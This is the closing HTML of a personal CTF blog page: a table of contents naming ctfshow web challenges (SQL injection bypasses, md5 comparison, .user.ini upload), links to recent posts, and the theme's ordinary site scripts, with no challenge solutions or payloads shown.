class="toc-text">web5（md5弱比较）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web6%EF%BC%88sql%E6%B3%A8%E5%85%A5%E7%A9%BA%E6%A0%BC%E7%BB%95%E8%BF%87post%EF%BC%89"><span class="toc-number">1.6.</span> <span class="toc-text">web6（sql注入空格绕过post）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web7%EF%BC%88sql%E6%B3%A8%E5%85%A5%E7%A9%BA%E6%A0%BC%E7%BB%95%E8%BF%87get%EF%BC%89"><span class="toc-number">1.7.</span> <span class="toc-text">web7（sql注入空格绕过get）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web8%EF%BC%88sql%E6%B3%A8%E5%85%A5%E8%BF%87%E6%BB%A4%E4%BA%86%E7%A9%BA%E6%A0%BC%E3%80%81union%E3%80%81and%E3%80%81%E9%80%97%E5%8F%B7%EF%BC%8C%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%EF%BC%89"><span class="toc-number">1.8.</span> <span class="toc-text">web8（sql注入过滤了空格、union、and、逗号，报错注入）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web9%EF%BC%88sql%E6%B3%A8%E5%85%A5md5-str-true-%E7%B1%BB%E5%9E%8B%E7%BB%95%E8%BF%87%EF%BC%89"><span class="toc-number">1.9.</span> <span class="toc-text">web9（sql注入md5($str,true)类型绕过）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web10%EF%BC%88sql%E6%B3%A8%E5%85%A5%E9%80%9A%E8%BF%87group-by-%E2%80%A6-with-rollup%E7%BB%95%E8%BF%87%EF%BC%89"><span class="toc-number">1.10.</span> <span class="toc-text">web10（sql注入通过group by … with rollup绕过）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web11%EF%BC%88session%E7%BB%95%E8%BF%87%EF%BC%89"><span class="toc-number">1.11.</span> <span class="toc-text">web11（session绕过）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web12%EF%BC%88eval%E5%8D%B1%E9%99%A9%E5%87%BD%E6%95%B0%E6%B3%A8%E5%85%A5%E5%88%A9%E7%94%A8%EF%BC%89"><span class="toc-number">1.12.</span> <span class="toc-text">web12（eval危险函数注入利用）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BA%A2%E5%8C%85%E9%A2%98%E7%AC%AC%E4%BA%8C%E5%BC%B9"><span class="toc-number">1.13.</span> <span class="toc-text">红包题第二弹</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web13%EF%BC%88-user-ini%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%EF%BC%89"><span class="toc-number">1.14.</span> <span class="toc-text">web13（.user.ini文件上传）</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#user-ini"><span class="toc-number">1.14.0.1.</span> <span class="toc-text">.user.ini</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web14%EF%BC%88sql%E6%B3%A8%E5%85%A5%EF%BC%8C%E8%BF%87%E6%BB%A4%E5%B0%91%E8%AE%B8%E8%AF%AD%E5%8F%A5%EF%BC%8Cload-file%E5%87%BD%E6%95%B0%E4%B8%8B%E8%BD%BD%E6%95%B0%E6%8D%AE%E5%BA%93%E6%96%87%E4%BB%B6%EF%BC%89"><span class="toc-number">1.15.</span> <span class="toc-text">web14（sql注入，过滤少许语句，load_file函数下载数据库文件）</span></a></li></ol></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/2024/11/12/vulnhub-DC-1/" title="vulnhub-DC-1"><img src="/img/background.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="vulnhub-DC-1"/></a><div class="content"><a class="title" href="/2024/11/12/vulnhub-DC-1/" title="vulnhub-DC-1">vulnhub-DC-1</a><time datetime="2024-11-12T12:27:50.000Z" title="发表于 2024-11-12 20:27:50">2024-11-12</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2024/11/10/HMV-UP/" title="HMV-UP"><img src="/img/background.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="HMV-UP"/></a><div class="content"><a class="title" href="/2024/11/10/HMV-UP/" title="HMV-UP">HMV-UP</a><time datetime="2024-11-10T10:29:23.000Z" title="发表于 2024-11-10 18:29:23">2024-11-10</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2024/05/14/hnctf2024/" title="hnctf2024"><img src="/img/background.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="hnctf2024"/></a><div class="content"><a class="title" href="/2024/05/14/hnctf2024/" title="hnctf2024">hnctf2024</a><time datetime="2024-05-14T12:26:31.000Z" title="发表于 2024-05-14 20:26:31">2024-05-14</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2023/11/26/BJDCTF2020/" title="BJDCTF2020"><img src="/img/bjd.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="BJDCTF2020"/></a><div class="content"><a class="title" href="/2023/11/26/BJDCTF2020/" title="BJDCTF2020">BJDCTF2020</a><time datetime="2023-11-26T06:50:58.000Z" title="发表于 2023-11-26 14:50:58">2023-11-26</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2023/11/21/NSSCTF/" title="NSSCTF"><img src="/img/better.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="NSSCTF"/></a><div class="content"><a class="title" href="/2023/11/21/NSSCTF/" title="NSSCTF">NSSCTF</a><time datetime="2023-11-21T15:05:31.000Z" title="发表于 2023-11-21 23:05:31">2023-11-21</time></div></div></div></div></div></div></main><footer id="footer" style="background-image: url('/img/ctfshow.gif')"><div id="footer-wrap"><div class="copyright">&copy;2022 - 2024 By Six_plum</div><div class="footer_custom_text">I wish you to become your own sun, no need to rely on who's light.</div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div id="local-search"><div class="search-dialog"><nav class="search-nav"><span class="search-dialog-title">搜索</span><span id="loading-status"></span><button class="search-close-button"><i class="fas fa-times"></i></button></nav><div class="is-center" id="loading-database"><i class="fas fa-spinner fa-pulse"></i><span>  数据库加载中</span></div><div class="search-wrap"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章" type="text"/></div></div><hr/><div id="local-search-results"></div></div></div><div id="search-mask"></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.min.js"></script><script src="/js/search/local-search.js"></script><div class="js-pjax"></div><canvas class="fireworks" mobile="false"></canvas><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/fireworks.min.js"></script><script defer="defer" id="ribbon" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/canvas-ribbon.min.js" size="150" alpha="0.6" zIndex="-1" mobile="true" data-click="true"></script><script id="canvas_nest" defer="defer" color="0,0,255" opacity="0.7" zIndex="-1" count="99" mobile="false" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/canvas-nest.min.js"></script><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/activate-power-mode.min.js"></script><script>POWERMODE.colorful = true;
POWERMODE.shake = true;
POWERMODE.mobile = false;
document.body.addEventListener('input', POWERMODE);
</script><script src="https://cdn.jsdelivr.net/npm/pjax/pjax.min.js"></script><script>let pjaxSelectors = ["head > title","#config-diff","#body-wrap","#rightside-config-hide","#rightside-config-show",".js-pjax"]

var pjax = new Pjax({
  elements: 'a:not([target="_blank"]):not([href="/music/"]):not([href="/no-pjax/"])',
  selectors: pjaxSelectors,
  cacheBust: false,
  analytics: false,
  scrollRestoration: false
})

document.addEventListener('pjax:send', function () {

  // removeEventListener scroll 
  window.tocScrollFn && window.removeEventListener('scroll', window.tocScrollFn)
  window.scrollCollect && window.removeEventListener('scroll', scrollCollect)

  document.getElementById('rightside').style.cssText = "opacity: ''; transform: ''"
  
  if (window.aplayers) {
    for (let i = 0; i < window.aplayers.length; i++) {
      if (!window.aplayers[i].options.fixed) {
        window.aplayers[i].destroy()
      }
    }
  }

  typeof typed === 'object' && typed.destroy()

  //reset readmode
  const $bodyClassList = document.body.classList
  $bodyClassList.contains('read-mode') && $bodyClassList.remove('read-mode')

  typeof disqusjs === 'object' && disqusjs.destroy()
})

document.addEventListener('pjax:complete', function () {
  window.refreshFn()

  document.querySelectorAll('script[data-pjax]').forEach(item => {
    const newScript = document.createElement('script')
    const content = item.text || item.textContent || item.innerHTML || ""
    Array.from(item.attributes).forEach(attr => newScript.setAttribute(attr.name, attr.value))
    newScript.appendChild(document.createTextNode(content))
    item.parentNode.replaceChild(newScript, item)
  })

  GLOBAL_CONFIG.islazyload && window.lazyLoadInstance.update()

  typeof chatBtnFn === 'function' && chatBtnFn()
  typeof panguInit === 'function' && panguInit()

  // google analytics
  typeof gtag === 'function' && gtag('config', '', {'page_path': window.location.pathname});

  // baidu analytics
  typeof _hmt === 'object' && _hmt.push(['_trackPageview',window.location.pathname]);

  typeof loadMeting === 'function' && document.getElementsByClassName('aplayer').length && loadMeting()

  // prismjs
  typeof Prism === 'object' && Prism.highlightAll()
})

document.addEventListener('pjax:error', (e) => {
  if (e.request.status === 404) {
    pjax.loadUrl('/404.html')
  }
})</script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div><!-- 樱花特效 启用时删去下面的<!即可-->
<!<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/yremp/yremp-js@1.5/sakura.js"><!</script></body></html><!<script type="text/javascript" src="\js\sakura.js"><!</script>